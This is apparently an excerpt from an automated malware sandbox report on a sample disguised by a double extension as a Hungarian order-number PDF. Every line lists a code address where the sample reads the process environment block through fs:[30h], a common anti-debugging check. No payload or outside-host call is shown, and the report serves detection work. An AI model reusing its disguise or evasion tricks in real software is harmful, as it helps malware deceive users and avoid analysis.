            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359F71F mov eax, dword ptr fs:[00000030h]5_2_3359F71F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359F71F mov eax, dword ptr fs:[00000030h]5_2_3359F71F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362972B mov eax, dword ptr fs:[00000030h]5_2_3362972B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F72E mov eax, dword ptr fs:[00000030h]5_2_3361F72E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33565702 mov eax, dword ptr fs:[00000030h]5_2_33565702
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33565702 mov eax, dword ptr fs:[00000030h]5_2_33565702
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33567703 mov eax, dword ptr fs:[00000030h]5_2_33567703
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363B73C mov eax, dword ptr fs:[00000030h]5_2_3363B73C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363B73C mov eax, dword ptr fs:[00000030h]5_2_3363B73C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363B73C mov eax, dword ptr fs:[00000030h]5_2_3363B73C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363B73C mov eax, dword ptr fs:[00000030h]5_2_3363B73C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559730 mov eax, dword ptr fs:[00000030h]5_2_33559730
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559730 mov eax, dword ptr fs:[00000030h]5_2_33559730
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356973A mov eax, dword ptr fs:[00000030h]5_2_3356973A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356973A mov eax, dword ptr fs:[00000030h]5_2_3356973A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33595734 mov eax, dword ptr fs:[00000030h]5_2_33595734
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33563720 mov eax, dword ptr fs:[00000030h]5_2_33563720
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F720 mov eax, dword ptr fs:[00000030h]5_2_3357F720
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F720 mov eax, dword ptr fs:[00000030h]5_2_3357F720
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F720 mov eax, dword ptr fs:[00000030h]5_2_3357F720
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335657C0 mov eax, dword ptr fs:[00000030h]5_2_335657C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335657C0 mov eax, dword ptr fs:[00000030h]5_2_335657C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335657C0 mov eax, dword ptr fs:[00000030h]5_2_335657C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D7E0 mov ecx, dword ptr fs:[00000030h]5_2_3356D7E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361D7B0 mov eax, dword ptr fs:[00000030h]5_2_3361D7B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361D7B0 mov eax, dword ptr fs:[00000030h]5_2_3361D7B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336337B6 mov eax, dword ptr fs:[00000030h]5_2_336337B6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D7B0 mov eax, dword ptr fs:[00000030h]5_2_3358D7B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F78A mov eax, dword ptr fs:[00000030h]5_2_3361F78A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E97A9 mov eax, dword ptr fs:[00000030h]5_2_335E97A9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33599660 mov eax, dword ptr fs:[00000030h]5_2_33599660
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33599660 mov eax, dword ptr fs:[00000030h]5_2_33599660
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335FD660 mov eax, dword ptr fs:[00000030h]5_2_335FD660
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33563616 mov eax, dword ptr fs:[00000030h]5_2_33563616
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33563616 mov eax, dword ptr fs:[00000030h]5_2_33563616
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33635636 mov eax, dword ptr fs:[00000030h]5_2_33635636
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359F603 mov eax, dword ptr fs:[00000030h]5_2_3359F603
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33591607 mov eax, dword ptr fs:[00000030h]5_2_33591607
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361D6F0 mov eax, dword ptr fs:[00000030h]5_2_3361D6F0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335916CF mov eax, dword ptr fs:[00000030h]5_2_335916CF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F6C7 mov eax, dword ptr fs:[00000030h]5_2_3361F6C7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336216CC mov eax, dword ptr fs:[00000030h]5_2_336216CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336216CC mov eax, dword ptr fs:[00000030h]5_2_336216CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336216CC mov eax, dword ptr fs:[00000030h]5_2_336216CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336216CC mov eax, dword ptr fs:[00000030h]5_2_336216CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D6E0 mov eax, dword ptr fs:[00000030h]5_2_3358D6E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D6E0 mov eax, dword ptr fs:[00000030h]5_2_3358D6E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E368C mov eax, dword ptr fs:[00000030h]5_2_335E368C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E368C mov eax, dword ptr fs:[00000030h]5_2_335E368C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E368C mov eax, dword ptr fs:[00000030h]5_2_335E368C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E368C mov eax, dword ptr fs:[00000030h]5_2_335E368C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335576B2 mov eax, dword ptr fs:[00000030h]5_2_335576B2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335576B2 mov eax, dword ptr fs:[00000030h]5_2_335576B2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335576B2 mov eax, dword ptr fs:[00000030h]5_2_335576B2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355D6AA mov eax, dword ptr fs:[00000030h]5_2_3355D6AA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355D6AA mov eax, dword ptr fs:[00000030h]5_2_3355D6AA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359B570 mov eax, dword ptr fs:[00000030h]5_2_3359B570
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359B570 mov eax, dword ptr fs:[00000030h]5_2_3359B570
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B550 mov eax, dword ptr fs:[00000030h]5_2_3360B550
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B550 mov eax, dword ptr fs:[00000030h]5_2_3360B550
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B550 mov eax, dword ptr fs:[00000030h]5_2_3360B550
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B562 mov eax, dword ptr fs:[00000030h]5_2_3355B562
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361B52F mov eax, dword ptr fs:[00000030h]5_2_3361B52F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33635537 mov eax, dword ptr fs:[00000030h]5_2_33635537
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33597505 mov eax, dword ptr fs:[00000030h]5_2_33597505
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33597505 mov ecx, dword ptr fs:[00000030h]5_2_33597505
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359D530 mov eax, dword ptr fs:[00000030h]5_2_3359D530
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359D530 mov eax, dword ptr fs:[00000030h]5_2_3359D530
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335895DA mov eax, dword ptr fs:[00000030h]5_2_335895DA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD5D0 mov eax, dword ptr fs:[00000030h]5_2_335DD5D0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD5D0 mov ecx, dword ptr fs:[00000030h]5_2_335DD5D0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335955C0 mov eax, dword ptr fs:[00000030h]5_2_335955C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336355C9 mov eax, dword ptr fs:[00000030h]5_2_336355C9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815F4 mov eax, dword ptr fs:[00000030h]5_2_335815F4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815F4 mov eax, dword ptr fs:[00000030h]5_2_335815F4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815F4 mov eax, dword ptr fs:[00000030h]5_2_335815F4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815F4 mov eax, dword ptr fs:[00000030h]5_2_335815F4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815F4 mov eax, dword ptr fs:[00000030h]5_2_335815F4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815F4 mov eax, dword ptr fs:[00000030h]5_2_335815F4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336335D7 mov eax, dword ptr fs:[00000030h]5_2_336335D7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336335D7 mov eax, dword ptr fs:[00000030h]5_2_336335D7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336335D7 mov eax, dword ptr fs:[00000030h]5_2_336335D7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EB594 mov eax, dword ptr fs:[00000030h]5_2_335EB594
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EB594 mov eax, dword ptr fs:[00000030h]5_2_335EB594
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355758F mov eax, dword ptr fs:[00000030h]5_2_3355758F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355758F mov eax, dword ptr fs:[00000030h]5_2_3355758F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355758F mov eax, dword ptr fs:[00000030h]5_2_3355758F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F5BE mov eax, dword ptr fs:[00000030h]5_2_3361F5BE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F35BA mov eax, dword ptr fs:[00000030h]5_2_335F35BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F35BA mov eax, dword ptr fs:[00000030h]5_2_335F35BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F35BA mov eax, dword ptr fs:[00000030h]5_2_335F35BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F35BA mov eax, dword ptr fs:[00000030h]5_2_335F35BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F5B0 mov eax, dword ptr fs:[00000030h]5_2_3358F5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F5B0 mov eax, dword ptr fs:[00000030h]5_2_3358F5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F5B0 mov eax, dword ptr fs:[00000030h]5_2_3358F5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F5B0 mov eax, dword ptr fs:[00000030h]5_2_3358F5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F5B0 mov eax, dword ptr fs:[00000030h]5_2_3358F5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F5B0 mov eax, dword ptr fs:[00000030h]5_2_3358F5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F5B0 mov eax, dword ptr fs:[00000030h]5_2_3358F5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F5B0 mov eax, dword ptr fs:[00000030h]5_2_3358F5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F5B0 mov eax, dword ptr fs:[00000030h]5_2_3358F5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335FD5B0 mov eax, dword ptr fs:[00000030h]5_2_335FD5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335FD5B0 mov eax, dword ptr fs:[00000030h]5_2_335FD5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815A9 mov eax, dword ptr fs:[00000030h]5_2_335815A9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815A9 mov eax, dword ptr fs:[00000030h]5_2_335815A9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815A9 mov eax, dword ptr fs:[00000030h]5_2_335815A9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815A9 mov eax, dword ptr fs:[00000030h]5_2_335815A9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335815A9 mov eax, dword ptr fs:[00000030h]5_2_335815A9
